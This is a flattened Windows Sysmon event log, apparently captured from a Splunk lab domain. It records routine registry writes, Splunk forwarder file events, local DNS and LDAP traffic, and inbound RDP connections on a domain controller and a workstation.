Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001048353Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:03:08.073{5EBD8912-7F30-614D-1200-00000000FC01}492C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{539531aa-0a0b-4bba-b26e-65076530b444}\DhcpConnForceBroadcastFlagDWORD (0x00000000) 13241300x80000000000000001048352Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:03:08.073{5EBD8912-7F30-614D-1200-00000000FC01}492C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{539531aa-0a0b-4bba-b26e-65076530b444}\IsServerNapAwareDWORD (0x00000000) 13241300x80000000000000001048351Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:03:08.073{5EBD8912-7F30-614D-1200-00000000FC01}492C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{539531aa-0a0b-4bba-b26e-65076530b444}\AddressTypeDWORD (0x00000000) 13241300x80000000000000001048350Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:03:08.073{5EBD8912-7F30-614D-1200-00000000FC01}492C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{539531aa-0a0b-4bba-b26e-65076530b444}\LeaseTerminatesTimeDWORD (0x615196dc) 13241300x80000000000000001048349Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:03:08.073{5EBD8912-7F30-614D-1200-00000000FC01}492C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{539531aa-0a0b-4bba-b26e-65076530b444}\T2DWORD (0x6151951a) 13241300x80000000000000001048348Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:03:08.073{5EBD8912-7F30-614D-1200-00000000FC01}492C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{539531aa-0a0b-4bba-b26e-65076530b444}\T1DWORD (0x61518fd4) 13241300x80000000000000001048347Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:03:08.072{5EBD8912-7F30-614D-1200-00000000FC01}492C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{539531aa-0a0b-4bba-b26e-65076530b444}\LeaseObtainedTimeDWORD (0x615188cc) 13241300x80000000000000001048346Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:03:08.072{5EBD8912-7F30-614D-1200-00000000FC01}492C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{539531aa-0a0b-4bba-b26e-65076530b444}\LeaseDWORD (0x00000e10) 13241300x80000000000000001048345Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:03:08.072{5EBD8912-7F30-614D-1200-00000000FC01}492C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{539531aa-0a0b-4bba-b26e-65076530b444}\DhcpServer10.0.1.1 13241300x80000000000000001048344Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:03:08.072{5EBD8912-7F30-614D-1200-00000000FC01}492C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{539531aa-0a0b-4bba-b26e-65076530b444}\DhcpSubnetMask255.255.255.0 13241300x80000000000000001048343Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:03:08.072{5EBD8912-7F30-614D-1200-00000000FC01}492C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{539531aa-0a0b-4bba-b26e-65076530b444}\DhcpIPAddress10.0.1.14 13241300x80000000000000001048342Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:03:08.072{5EBD8912-7F30-614D-1200-00000000FC01}492C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{539531aa-0a0b-4bba-b26e-65076530b444}\DhcpInterfaceOptionsBinary Data 23542300x80000000000000001048360Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:09.693{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA1D1681F43911C16EA409EE3CC6DF90,SHA256=83D09F8F9C709BCB0985627DD99F68CD329D2158BE78FAC25841965E43021609,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976947Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:05.946{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-52376-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000976946Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:05.855{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-50316-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976945Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:09.009{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=324E633A3D2863198B921FCE2FC879EF,SHA256=25673651C404B1E98907F01640C4991DA00777CD6FC13C6B530A1EDC74ADA7A5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048359Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:07.763{5EBD8912-7F30-614D-1200-00000000FC01}492C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.14win-dc-429.attackrange.local68bootpcfalse10.0.1.1ip-10-0-1-1.eu-central-1.compute.internal67bootps 354300x80000000000000001048358Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:06.766{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49244-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001048357Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:06.460{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.115-54372-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001048377Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:10.710{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37083A32477CA2F950E9472ADE43DFAC,SHA256=C10E296DC9B35C73450FEDE45A84FC77E01F428E374E736708AC29874BE9DEE4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976949Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:07.731{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59278-false10.0.1.12-8000- 23542300x8000000000000000976948Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:10.024{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD6A2D56CC4E0FA60E80C88E66193292,SHA256=8B23FCCDCED2AD93F55F2298DA4755CA2DF59EA48985F4BC8C510260DDC600C2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048376Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:07.769{5EBD8912-7F30-614D-1400-00000000FC01}1104C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10e:0:0:c8d0:b50a:84e0:ffff-57218-truee000:fc:0:0:0:0:0:0-5355llmnr 354300x80000000000000001048375Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:07.769{5EBD8912-7F30-614D-1400-00000000FC01}1104C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local57218-trueff02:0:0:0:0:0:1:3-5355llmnr 13241300x80000000000000001048374Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:03:10.126{5EBD8912-7F30-614D-1400-00000000FC01}1104C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\RegisteredSinceBootDWORD (0x00000001) 13241300x80000000000000001048373Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:03:10.126{5EBD8912-7F30-614D-1400-00000000FC01}1104C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\StaleAdapterDWORD (0x00000000) 13241300x80000000000000001048372Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:03:10.126{5EBD8912-7F30-614D-1400-00000000FC01}1104C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\CompartmentIdDWORD (0x00000001) 13241300x80000000000000001048371Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:03:10.126{5EBD8912-7F30-614D-1400-00000000FC01}1104C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\FlagsDWORD (0x00000002) 13241300x80000000000000001048370Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:03:10.126{5EBD8912-7F30-614D-1400-00000000FC01}1104C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\TtlDWORD (0x000004b0) 13241300x80000000000000001048369Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:03:10.126{5EBD8912-7F30-614D-1400-00000000FC01}1104C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\SentPriUpdateToIpBinary Data 13241300x80000000000000001048368Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:03:10.126{5EBD8912-7F30-614D-1400-00000000FC01}1104C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\SentUpdateToIpBinary Data 13241300x80000000000000001048367Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:03:10.126{5EBD8912-7F30-614D-1400-00000000FC01}1104C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\DnsServersBinary Data 13241300x80000000000000001048366Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:03:10.126{5EBD8912-7F30-614D-1400-00000000FC01}1104C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\HostAddrsBinary Data 13241300x80000000000000001048365Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:03:10.126{5EBD8912-7F30-614D-1400-00000000FC01}1104C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\PrimaryDomainNameattackrange.local 13241300x80000000000000001048364Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:03:10.126{5EBD8912-7F30-614D-1400-00000000FC01}1104C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\AdapterDomainName(Empty) 13241300x80000000000000001048363Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:03:10.126{5EBD8912-7F30-614D-1400-00000000FC01}1104C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\Hostnamewin-dc-429 10341000x80000000000000001048362Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:10.110{5EBD8912-7F2D-614D-0B00-00000000FC01}6241764C:\Windows\system32\lsass.exe{5EBD8912-7F30-614D-1400-00000000FC01}1104C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+2b3d4|C:\Windows\system32\lsasrv.dll+30485|C:\Windows\system32\lsasrv.dll+2e31b|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+15ded|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 13241300x80000000000000001048361Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:03:10.110{5EBD8912-7F30-614D-1400-00000000FC01}1104C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\RegisteredSinceBootDWORD (0x00000001) 23542300x80000000000000001048384Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:11.714{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61A9AADCC761C515F14EF28204A157E3,SHA256=AA100A9DC25C54EAB42FAA60780E2195B4704C7591AF81478B4EF54F53DC15DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976951Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:11.055{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BF05DB3E58AD33F43C7E4E09B416E842,SHA256=7C2BE0F0AB4894E700F0294D9006A61DBB2CCAABCF2EF2277330D9C1C3E385B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976950Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:11.024{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BAFE9224B48291A82A985482382C2C12,SHA256=8BFA300641DF4E8AB9B3A49F94E983FEACCEA84B021D9C6BA0CB23330F436BC0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048383Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:09.812{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-429.attackrange.local53228-false10.0.1.14win-dc-429.attackrange.local53domain 354300x80000000000000001048382Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:09.812{5EBD8912-7F30-614D-1400-00000000FC01}1104C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.14win-dc-429.attackrange.local53228-false10.0.1.14win-dc-429.attackrange.local53domain 354300x80000000000000001048381Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:09.810{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local49582- 354300x80000000000000001048380Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:09.810{5EBD8912-7F30-614D-1400-00000000FC01}1104C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruefalse10.0.1.14win-dc-429.attackrange.local49582-false10.0.1.14win-dc-429.attackrange.local53domain 354300x80000000000000001048379Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:09.809{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local57733- 23542300x80000000000000001048378Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:11.141{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=671B720D86A09CBF2AC46C433D09A513,SHA256=CD872D9992A6D16642CE8C89679EC718123C8A295BC075A88BF6D21662FD0C7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048395Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:12.716{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E0E2DB695F735E1D7BB267B4A32201B,SHA256=D0A7E2DF850F72A238ABE84721B74BAF0F5182E06A10BFB2C1EBE7267D0FB8C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976952Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:12.040{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22A5554F08E88237BDB102ED410C4129,SHA256=ABE9A502F485B6BDBD5A54A068716CB552906D8ACBE2D9D73740A0AE67FC027F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048394Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:12.700{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ECAC8390DA4F9CE924318B3914601967,SHA256=B73CD60776F16066248F49B593B642D799C4486AE2CA9BFEFE2D37E5AD770C15,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048393Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:10.085{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de64881-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001048392Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:09.823{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local57621- 354300x80000000000000001048391Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:09.822{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local58669-false10.0.1.14win-dc-429.attackrange.local53domain 354300x80000000000000001048390Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:09.822{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local58669- 354300x80000000000000001048389Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:09.822{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruea00:10e:0:0:c8d0:b50a:84e0:ffff-58669-truea00:10e:0:0:0:0:0:0win-dc-429.attackrange.local53domain 354300x80000000000000001048388Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:09.822{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local57936- 354300x80000000000000001048387Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:09.821{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local64460-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domain 354300x80000000000000001048386Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:09.815{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53229-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001048385Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:09.815{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53229-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 23542300x80000000000000001048396Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:13.800{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18D091CA033A79E626EF1049FEE8EA53,SHA256=89C7B78A97C6E058A5889D1D9312526BD4527FC8138699D827DEC180FD8079A1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976956Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:10.043{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-22079-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976955Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:13.493{69CF5F33-7F29-614D-1D00-00000000FD01}1960NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976954Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:13.055{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B65659BF80AB5583B4F684FBFC674C61,SHA256=5B1AE3BE35B4B9AE7260963BE82D95F75EE3550284A660CB2A1FA784AB5AAB26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976953Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:13.024{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E60ECCFE2D9DA94D1D9AC699471A51C2,SHA256=81B78CCAEF5CB060631F788B4FE85D94B67FACBB066CBB1978DCD5550967C239,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048397Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:14.815{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB0FC992FCFE1DA2AD230B56DA4E5265,SHA256=64700DB2486578AE9DCE94B7C6B08FE62C8BE113463857D3F854E0CCDB41E4F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976957Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:14.071{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 